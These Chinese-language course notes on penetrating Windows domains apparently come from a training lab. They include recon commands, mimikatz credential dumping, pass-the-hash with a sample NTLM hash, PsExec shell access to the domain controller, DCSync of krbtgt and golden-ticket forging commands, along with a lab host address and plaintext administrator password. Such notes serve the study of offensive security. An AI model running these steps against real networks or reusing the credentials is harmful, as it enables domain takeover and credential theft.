内网渗透2
# 域控
域的定义:将网络中的多台计算机在逻辑上组织到一起,进行集中管理。
域的模型:
批量管理
域管理员 和 普通用户 域控主机 普通主机
需要批量管理内网主机的场景。
教室模型:
老师 => 管理员
讲台 => 域控
学生 => 普通用户 /域用户
学生的座位 => 普通主机
# 域控攻击目标
拿下域控主机和管理员账号
拿下域控之后,就等于控制了所有加入该域的主机。
### 信息收集
gognj2dm.aqlab.cn:12781
administrator/ woshifengge1.
1. 判断当前主机是否在域中
ipconfig /all
systeminfo
net time /domain 通过域用户登录主机
使用主机的账号 进行登录时,命令报错
不在域中,就只能通过普通的攻击手段进行利用:
1. 收集内网存活主机
IPv4地址 10.0.1.1-255 => 这么多个IP 不一定存在255台电脑
子网掩码 255.255.255.0
nmap,fscan 等工具完成
10.0.1.8 administrator woshifengge1.
10.0.18 所在域 : zkaq.cn
##### 本地用户 与 域用户
域环境下的用户 线上用户 => 可以和好朋友一起互动
zkaq.cn\administrator
本地用户 离线用户 => 单机游戏
\[A1\\\]administrator
2. 查找域控
1. 查找内网的dns服务器,从而确定域控主机
nslookup zkaq.cn
ping zkaq.cn
10.0.1.6 => ms17-010
2. 查看域控制器的机器名
nltest /DCLIST:域名
dc.zkaq.cn
3. 对域控发动攻击
通过检查 域控主机是否存在可利用的漏洞,如果存在可以利用的漏洞,直接对漏洞发动攻击,拿下目标服务器。
内网攻击的取巧的手段:
猕猴桃 抓取 10.0.1.8主机的历史登录记录,可能能获得域用户名和密码。
win server 2008 之后的版本,系统不在明文存储密码,存放的是加密后的数据
NTLM : 61465a991b168727b65b3644aab823cd 用户密码的密文,hash
hash理论上不能被破解,
md5 字典 由明文 => 密文
abcd => xxxxxxxx
a => yyyy
b => zzzz
...
abcd => xxxxxxxx
通过密文反推明文
麻烦 彩虹表
### windows系统的三种登录方式
1. 本地登录
2. 远程登录 (rdp)
使用 明文的用户名和密码进行登录的。
3. 网络登录
登录记录,凭证。
cookie => 1. 输入用户名密码 => 2. 服务器后台生成一对 session 和 cookie => 将cookie返回给浏览器 => 再次访问时,只需要提供cookie,就能完成鉴权操作。
NTLM 协议认证
kerberos 协议认证
登录后的特征数据,来去进行身份校验
# NTLM协议
哈希传递 的方式实现一个攻击
攻击原理: 认证过程中有一个缺陷,可以让我们直接传递密文的hash值,和存储在数据库中的hash值进行比对
1. 用户提供账号密码
1. windows接收到账号密码之后 = > 对密码进行NTLM哈希计算
1. 将加密后的数据 和 电脑中保存的数据进行比较
哈希传递 : 跳过前两步,直接通过 提供加密后的 hash值,让电脑进行比较
smb服务进行攻击的
NTLM
User Name : administrator
NTLM: 61465a991b168727b65b3644aab823cd
sekurlsa::pth /user:administrator /domain:"zkaq.cn" /ntlm:61465a991b168727b65b3644aab823cd # 完成hash传递攻击
借助工具,获得目标系统的cmd操控权
psExec.exe \\dc.zkaq.cn cmd
# kerberos 协议认证(不容易被发现)
认证方式:通过令牌来完成认证的
通过用户名密码登录之后,就可以获得一系列的信息。生成一个凭据(证书)。当我想要再次访问服务器时,只需要提供这个这份凭据,就可以了。
在获得目标系统的操作权限之后,利用登录信息制作一份证书,之后再想使用的时候,就只需要携带上证书的信息,就可以访问了。
票据制作,并不是任意用户都能用来制作的。 密码修改之后,票据就失效。
黄金票据
1. 高权限用户
2. 最好用户名密码不会修改
krbtgt 这个用户, 默认存在的管理员用户, administrator ,rubik
#### 黄金票据的制作
1. krbtgt用户
sid
hash NTLM
获取票据制作的信息
lsadump::dcsync /user:krbtgt
sid S-1-5-21-4098506371-3349406080-1400905760
Hash NTLM: 9f7afad7acc9f72b7e338b908795b7da
制作票据:
kerberos::golden /admin:administrator /domain:zkaq.cn /sid:S-1-5-21-4098506371-3349406080-1400905760 /krbtgt:9f7afad7acc9f72b7e338b908795b7da /ticket:administrator.kiribikerberos::ptt administrator.kiribi # 加载票据
当我获得 sid和ntlm的值之后,能否在本地制作证书.
制作证书只需要在目标域中即可 并不一定要在域控主机上完成
白银票据
# 总结
域的概念
域控主机 成员主机 域管理员 域用户 本地用户
信息收集
判断主机是否加入了域
加入域 => 借助 网络登录 的方式 来实现攻击
NTLM 协议
hash传递 => 需要使用域用户的hash进行传递
kerberos 协议
黄金票据
制作票据时只需要在目标域环境中即可
白银票据
通过域控进行横向